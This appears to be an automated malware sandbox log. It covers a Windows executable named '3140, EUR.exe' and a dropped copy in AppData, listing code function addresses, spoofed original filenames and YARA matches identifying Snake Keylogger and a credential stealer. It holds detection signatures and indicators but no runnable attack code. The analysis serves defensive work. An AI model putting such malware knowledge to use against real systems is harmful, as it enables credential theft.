Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_0764DDA0 0_2_0764DDA0
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07641C40 0_2_07641C40
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07641C50 0_2_07641C50
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07642A20 0_2_07642A20
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07642A11 0_2_07642A11
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_0764D968 0_2_0764D968
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_0764D958 0_2_0764D958
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07643928 0_2_07643928
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07647908 0_2_07647908
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07643918 0_2_07643918
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_0785E0E0 0_2_0785E0E0
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_0785C468 0_2_0785C468
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_0785C478 0_2_0785C478
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_0785E0C0 0_2_0785E0C0
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_0785D0C9 0_2_0785D0C9
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_0785D0D8 0_2_0785D0D8
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07854D00 0_2_07854D00
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_07854CF0 0_2_07854CF0
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_0785E838 0_2_0785E838
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 0_2_0785E848 0_2_0785E848
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 8_2_02E1D278 8_2_02E1D278
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 8_2_02E15362 8_2_02E15362
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 8_2_02E1A088 8_2_02E1A088
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 8_2_02E1C147 8_2_02E1C147
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 8_2_02E17118 8_2_02E17118
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 8_2_02E1C738 8_2_02E1C738
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 8_2_02E1C468 8_2_02E1C468
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 8_2_02E1CA08 8_2_02E1CA08
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 8_2_02E169A0 8_2_02E169A0
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 8_2_02E1E988 8_2_02E1E988
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 8_2_02E1CFA9 8_2_02E1CFA9
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 8_2_02E1CCD8 8_2_02E1CCD8
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 8_2_02E1F979 8_2_02E1F979
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 8_2_02E1E97A 8_2_02E1E97A
Source: C:\Users\user\Desktop\3140, EUR.exe Code function: 8_2_02E13E09 8_2_02E13E09
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_04FF0040 9_2_04FF0040
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_04FF001C 9_2_04FF001C
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_04FF3377 9_2_04FF3377
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_07634608 9_2_07634608
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_076336D0 9_2_076336D0
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_07630040 9_2_07630040
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_07630F28 9_2_07630F28
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763E750 9_2_0763E750
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_076336C0 9_2_076336C0
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_076345F9 9_2_076345F9
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_076334C0 9_2_076334C0
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_076334B1 9_2_076334B1
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_07635378 9_2_07635378
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_07635331 9_2_07635331
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_07635388 9_2_07635388
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_07633260 9_2_07633260
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_07633250 9_2_07633250
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763C168 9_2_0763C168
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_07630007 9_2_07630007
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_076330C0 9_2_076330C0
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_076330B0 9_2_076330B0
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_07630F17 9_2_07630F17
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_07631E40 9_2_07631E40
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_07633E40 9_2_07633E40
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_07634E40 9_2_07634E40
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_07631E50 9_2_07631E50
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_07633E50 9_2_07633E50
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_07634E50 9_2_07634E50
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_07633EFB 9_2_07633EFB
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763BD30 9_2_0763BD30
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763BD19 9_2_0763BD19
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763DDA0 9_2_0763DDA0
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_07631C40 9_2_07631C40
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_07631C50 9_2_07631C50
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_07632A20 9_2_07632A20
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_07632A11 9_2_07632A11
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763D967 9_2_0763D967
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_0763D968 9_2_0763D968
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_07633928 9_2_07633928
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 9_2_07633918 9_2_07633918
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_016EC2E9 15_2_016EC2E9
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_016E27B4 15_2_016E27B4
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_056EC46C 15_2_056EC46C
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_056EC738 15_2_056EC738
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_056EC147 15_2_056EC147
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_056E7118 15_2_056E7118
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_056EA088 15_2_056EA088
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_056E5362 15_2_056E5362
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_056ED278 15_2_056ED278
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_056ECCD8 15_2_056ECCD8
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_056ECFAB 15_2_056ECFAB
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_056E69A0 15_2_056E69A0
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_056EE988 15_2_056EE988
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_056ECA08 15_2_056ECA08
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_056E3E09 15_2_056E3E09
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_056EE97B 15_2_056EE97B
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_056EF979 15_2_056EF979
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_056E29EC 15_2_056E29EC
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_056E3AA1 15_2_056E3AA1
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F21E80 15_2_06F21E80
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F217A0 15_2_06F217A0
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F20B30 15_2_06F20B30
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F29C70 15_2_06F29C70
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F2FC68 15_2_06F2FC68
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F25028 15_2_06F25028
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F22968 15_2_06F22968
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F29548 15_2_06F29548
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F2E6B0 15_2_06F2E6B0
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F2E6AF 15_2_06F2E6AF
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F21E70 15_2_06F21E70
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F2E258 15_2_06F2E258
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F2E249 15_2_06F2E249
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F2DE00 15_2_06F2DE00
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F29BFA 15_2_06F29BFA
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F2F3B8 15_2_06F2F3B8
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F28BA0 15_2_06F28BA0
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F2F3A8 15_2_06F2F3A8
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F28B91 15_2_06F28B91
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F2178F 15_2_06F2178F
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F2EF60 15_2_06F2EF60
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F2EF51 15_2_06F2EF51
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F20B20 15_2_06F20B20
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F29328 15_2_06F29328
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F2EB08 15_2_06F2EB08
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F2D0F8 15_2_06F2D0F8
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F2CCA0 15_2_06F2CCA0
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F2CC8F 15_2_06F2CC8F
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F20040 15_2_06F20040
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F2F810 15_2_06F2F810
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F25018 15_2_06F25018
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F2F801 15_2_06F2F801
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F20006 15_2_06F20006
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F2DDFF 15_2_06F2DDFF
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F2D9A8 15_2_06F2D9A8
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F2D999 15_2_06F2D999
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F2D550 15_2_06F2D550
Source: C:\Users\user\AppData\Roaming\lkuPOyvaWlIu.exe Code function: 15_2_06F2D545 15_2_06F2D545
Sample file is different than original file name gathered from version info
Source: 3140, EUR.exe, 00000000.00000000.1656247053.0000000000402000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameOqNV.exe> vs 3140, EUR.exe
Source: 3140, EUR.exe, 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs 3140, EUR.exe
Source: 3140, EUR.exe, 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs 3140, EUR.exe
Source: 3140, EUR.exe, 00000000.00000002.1724176185.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs 3140, EUR.exe
Source: 3140, EUR.exe, 00000000.00000002.1743280560.0000000009FD0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs 3140, EUR.exe
Source: 3140, EUR.exe, 00000000.00000002.1740034846.000000000741E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameOqNV.exe> vs 3140, EUR.exe
Source: 3140, EUR.exe, 00000000.00000002.1727021709.0000000002AAB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs 3140, EUR.exe
Source: 3140, EUR.exe, 00000008.00000002.4120197349.0000000001177000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs 3140, EUR.exe
Source: 3140, EUR.exe Binary or memory string: OriginalFilenameOqNV.exe> vs 3140, EUR.exe
Uses 32bit PE files
Source: 3140, EUR.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 0.2.3140, EUR.exe.4397fe0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.3140, EUR.exe.4397fe0.1.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.3140, EUR.exe.4397fe0.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000009.00000002.1804417343.000000000447D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000009.00000002.1804417343.00000000042E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1729759863.0000000004062000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: 3140, EUR.exe PID: 6844, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: lkuPOyvaWlIu.exe PID: 7276, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3140, EUR.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: lkuPOyvaWlIu.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, ---.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, ---.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.3140, EUR.exe.4397fe0.1.raw.unpack, ----.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, ---.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, ---.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.lkuPOyvaWlIu.exe.42e2768.2.raw.unpack, ----.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, ---.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, ---.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.lkuPOyvaWlIu.exe.447dba0.1.raw.unpack, ----.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, SwCftK6S58okDsOPI5.cs Security API names: _0020.SetAccessControl
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, SwCftK6S58okDsOPI5.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.3140, EUR.exe.4312dc0.3.raw.unpack, SwCftK6S58okDsOPI5.cs Security API names: _0020.AddAccessRule
Source: 0.2.3140, EUR.exe.428dba0.0.raw.unpack, onTDHLANSwQB4GuLwN.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
